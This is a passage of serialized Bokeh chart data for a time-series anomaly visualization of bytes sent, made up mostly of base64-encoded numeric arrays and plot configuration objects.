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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArn6EkqOCE0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAE5zn6wMnec/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCiPgjLdgDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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\",\"dtype\":\"float64\",\"shape\":[840]}},\"selected\":{\"id\":\"1178\"},\"selection_policy\":{\"id\":\"1179\"}},\"id\":\"1131\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"1050\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"axis\":{\"id\":\"1015\"},\"grid_line_color\":null,\"ticker\":null},\"id\":\"1018\",\"type\":\"Grid\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"1171\",\"type\":\"DaysTicker\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"1174\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"axis_label\":\"TotalBytesSent\",\"formatter\":{\"id\":\"1038\"},\"ticker\":{\"id\":\"1020\"}},\"id\":\"1019\",\"type\":\"LinearAxis\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1129\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"text\":\"Time Series Anomalies Visualization\"},\"id\":\"1005\",\"type\":\"Title\"},{\"attributes\":{\"line_alpha\":0.1,\"line_color\":\"green\",\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"baseline\"}},\"id\":\"1065\",\"type\":\"Line\"},{\"attributes\":{},\"id\":\"1084\",\"type\":\"Selection\"},{\"attributes\":{\"axis\":{\"id\":\"1123\"},\"ticker\":null},\"id\":\"1126\",\"type\":\"Grid\"},{\"attributes\":{\"label\":{\"value\":\"baseline\"},\"renderers\":[{\"id\":\"1066\"}]},\"id\":\"1086\",\"type\":\"LegendItem\"},{\"attributes\":{\"fill_color\":{\"value\":\"blue\"},\"line_color\":{\"value\":\"blue\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"score\"}},\"id\":\"1133\",\"type\":\"Circle\"},{\"attributes\":{\"text\":\"Range Selector\"},\"id\":\"1113\",\"type\":\"Title\"},{\"attributes\":{\"data_source\":{\"id\":\"1087\"},\"glyph\":{\"id\":\"1089\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1090\"},\"selection_glyph\":null,\"view\":{\"id\":\"1092\"}},\"id\":\"1091\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"1051\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"below\":[{\"id\":\"1123\"},{\"id\":\"1128\"}],\"center\":[{\"id\":\"1126\"}],\"plot_height\":140,\"plot_width\":1200,\"renderers\":[{\"id\":\"1135\"}],\"title\":{\"id\":\"1113\"},\"toolbar\":{\"id\":\"1127\"},\"toolbar_location\":null,\"x_range\":{\"id\":\"1115\"},\"x_scale\":{\"id\":\"1119\"},\"y_range\":{\"id\":\"1117\"},\"y_scale\":{\"id\":\"1121\"}},\"id\":\"1112\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"1049\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"data\":{\"TimeGenerated\":{\"__ndarray__\":\"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